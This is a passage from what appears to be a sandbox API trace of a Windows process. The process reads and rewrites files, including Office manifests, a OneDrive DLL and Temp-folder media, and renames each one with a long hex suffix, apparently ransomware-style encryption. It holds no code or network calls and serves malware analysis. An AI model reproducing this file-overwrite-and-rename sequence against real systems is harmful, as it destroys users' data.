ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x749a520, ReturnLength=0x72aff5c) returned 0x0 [0156.048] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml", lpString2=".922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872" [0156.048] GetProcessHeap () returned 0x270000 [0156.048] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19e) returned 0x336678 [0156.048] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, 
FileInformation=0x336678, Length=0x19e, FileInformationClass=0xa) returned 0x0 [0156.049] CloseHandle (hObject=0x598) returned 1 [0156.058] GetProcessHeap () returned 0x270000 [0156.059] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x749a470 | out: hHeap=0x270000) returned 1 [0156.059] RtlInterlockedCompareExchange64 () returned 0x2 [0156.059] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.161] WriteFile (in: hFile=0x590, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0156.162] RtlInterlockedCompareExchange64 () returned 0x0 [0156.162] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.162] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0156.163] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml", lpString2=".1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303") 
returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303" [0156.163] GetProcessHeap () returned 0x270000 [0156.163] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a0) returned 0x4246260 [0156.164] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x72aff4c, FileInformation=0x4246260, Length=0x1a0, FileInformationClass=0xa) returned 0x0 [0156.165] CloseHandle (hObject=0x590) returned 1 [0156.170] GetProcessHeap () returned 0x270000 [0156.172] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0156.172] RtlInterlockedCompareExchange64 () returned 0x1 [0156.172] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.176] ReadFile (in: hFile=0x590, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0156.176] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.176] WriteFile (in: hFile=0x590, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0156.177] RtlInterlockedCompareExchange64 () returned 0x0 [0156.177] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, 
lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.178] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0156.179] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml", lpString2=".8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41" [0156.179] GetProcessHeap () returned 0x270000 [0156.179] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a6) returned 0x4277e30 [0156.179] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x72aff4c, FileInformation=0x4277e30, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0156.184] CloseHandle (hObject=0x590) returned 1 [0156.275] GetProcessHeap () returned 0x270000 [0156.304] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0156.304] RtlInterlockedCompareExchange64 () returned 0x1 [0156.304] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.394] NtQueryObject (in: Handle=0x5ac, 
ObjectInformationClass=0x1, ObjectInformation=0x7562618, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7562618, ReturnLength=0x72aff5c) returned 0x0 [0156.395] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2=".8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B" [0156.395] GetProcessHeap () returned 0x270000 [0156.395] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1bc) returned 0x36c080 [0156.395] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x72aff4c, FileInformation=0x36c080, Length=0x1bc, FileInformationClass=0xa) returned 0x0 [0156.397] CloseHandle (hObject=0x5ac) returned 1 [0156.402] GetProcessHeap () returned 0x270000 [0156.404] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7562568 | out: hHeap=0x270000) returned 1 [0156.413] RtlInterlockedCompareExchange64 () returned 0x1 [0156.413] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.414] WriteFile (in: hFile=0x590, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 
1 [0156.415] RtlInterlockedCompareExchange64 () returned 0x0 [0156.415] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.486] ReadFile (in: hFile=0x590, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x6200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0156.486] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.487] WriteFile (in: hFile=0x590, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x6200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0156.488] RtlInterlockedCompareExchange64 () returned 0x0 [0156.488] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.489] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0156.491] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2=".B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00" | out: 
lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00" [0156.491] GetProcessHeap () returned 0x270000 [0156.491] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a8) returned 0x4278510 [0156.491] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x72aff4c, FileInformation=0x4278510, Length=0x1a8, FileInformationClass=0xa) returned 0x0 [0156.493] CloseHandle (hObject=0x590) returned 1 [0156.496] GetProcessHeap () returned 0x270000 [0156.497] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0156.497] RtlInterlockedCompareExchange64 () returned 0x2 [0156.497] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0160.626] WriteFile (in: hFile=0x5b8, lpBuffer=0x757a558*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420 | out: lpBuffer=0x757a558*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x755a420) returned 1 [0160.803] RtlInterlockedCompareExchange64 () returned 0x6 [0160.803] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0161.017] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x750a220, ObjectInformationLength=0x10004, 
ReturnLength=0x72aff5c | out: ObjectInformation=0x750a220, ReturnLength=0x72aff5c) returned 0x0 [0161.018] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll", lpString2=".A286EFBE52240F654E523F5FF8FCE478CA83700D68BE9DEFDC72766003799F32" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll.A286EFBE52240F654E523F5FF8FCE478CA83700D68BE9DEFDC72766003799F32") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncApi.dll.A286EFBE52240F654E523F5FF8FCE478CA83700D68BE9DEFDC72766003799F32" [0161.018] GetProcessHeap () returned 0x270000 [0161.018] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x164) returned 0x74207d8 [0161.018] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x74207d8, Length=0x164, FileInformationClass=0xa) returned 0x0 [0161.020] CloseHandle (hObject=0x5b0) returned 1 [0161.031] GetProcessHeap () returned 0x270000 [0161.033] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x750a170 | out: hHeap=0x270000) returned 1 [0161.033] RtlInterlockedCompareExchange64 () returned 0x4 [0161.033] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0163.957] ReadFile (in: hFile=0x5b0, lpBuffer=0x7492450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318 | out: lpBuffer=0x7492450*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7472318) returned 1 [0163.958] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0163.959] WriteFile (in: hFile=0x5ac, lpBuffer=0x752a2a8*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170 | out: lpBuffer=0x752a2a8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a170) returned 1 [0163.967] RtlInterlockedCompareExchange64 () returned 0x1 [0163.967] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.062] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0164.064] RtlInterlockedCompareExchange64 () returned 0x0 [0164.064] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.079] WriteFile (in: hFile=0x5b0, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0164.080] RtlInterlockedCompareExchange64 () returned 0x0 [0164.080] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.097] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: 
ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0164.099] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a", lpString2=".95A5B4150B74375257334009E08994C50BB115BDEE037BDC208BFB828C8FAA10" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a.95A5B4150B74375257334009E08994C50BB115BDEE037BDC208BFB828C8FAA10") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUkj-n.m4a.95A5B4150B74375257334009E08994C50BB115BDEE037BDC208BFB828C8FAA10" [0164.099] GetProcessHeap () returned 0x270000 [0164.099] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x4275d10 [0164.099] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x4275d10, Length=0x120, FileInformationClass=0xa) returned 0x0 [0164.101] CloseHandle (hObject=0x5b0) returned 1 [0164.107] GetProcessHeap () returned 0x270000 [0164.108] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0164.108] RtlInterlockedCompareExchange64 () returned 0x1 [0164.108] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.113] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0164.114] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.116] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, 
ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0164.118] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi", lpString2=".EC002CF52F8916E1CC2135375217638ECDE8A1B95122D6DE8AE16825139C2769" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi.EC002CF52F8916E1CC2135375217638ECDE8A1B95122D6DE8AE16825139C2769") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\bUUqVBJ.avi.EC002CF52F8916E1CC2135375217638ECDE8A1B95122D6DE8AE16825139C2769" [0164.118] GetProcessHeap () returned 0x270000 [0164.118] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x425cb80 [0164.118] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x425cb80, Length=0x122, FileInformationClass=0xa) returned 0x0 [0164.127] CloseHandle (hObject=0x5b0) returned 1 [0164.134] GetProcessHeap () returned 0x270000 [0164.136] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0164.136] RtlInterlockedCompareExchange64 () returned 0x1 [0164.136] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.140] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0164.141] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, 
lpOverlapped=0x72aff60) returned 1 [0164.143] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0164.144] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv", lpString2=".17B0C287C7DD080EC87EF438FE7AFD429880134963AB3602012892BCFB0C9E77" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv.17B0C287C7DD080EC87EF438FE7AFD429880134963AB3602012892BCFB0C9E77") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\DidKyJ.flv.17B0C287C7DD080EC87EF438FE7AFD429880134963AB3602012892BCFB0C9E77" [0164.144] GetProcessHeap () returned 0x270000 [0164.144] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x4275e38 [0164.144] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x4275e38, Length=0x120, FileInformationClass=0xa) returned 0x0 [0164.146] CloseHandle (hObject=0x5b0) returned 1 [0164.150] GetProcessHeap () returned 0x270000 [0164.152] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0164.152] RtlInterlockedCompareExchange64 () returned 0x1 [0164.152] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.155] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0164.156] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, 
dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.157] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0164.159] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif", lpString2=".906CCF61FB2B45431FAAE58845D2BAB175F2B6E8C9C84B0077D199A76929464A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif.906CCF61FB2B45431FAAE58845D2BAB175F2B6E8C9C84B0077D199A76929464A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Ezjziivl4A.gif.906CCF61FB2B45431FAAE58845D2BAB175F2B6E8C9C84B0077D199A76929464A" [0164.159] GetProcessHeap () returned 0x270000 [0164.159] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x425ca48 [0164.159] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x72aff4c, FileInformation=0x425ca48, Length=0x128, FileInformationClass=0xa) returned 0x0 [0164.161] CloseHandle (hObject=0x5b0) returned 1 [0164.164] GetProcessHeap () returned 0x270000 [0164.165] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0164.165] RtlInterlockedCompareExchange64 () returned 0x1 [0164.165] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0164.168] ReadFile (in: hFile=0x5b0, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x6800, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0164.169] GetQueuedCompletionStatus (in: 
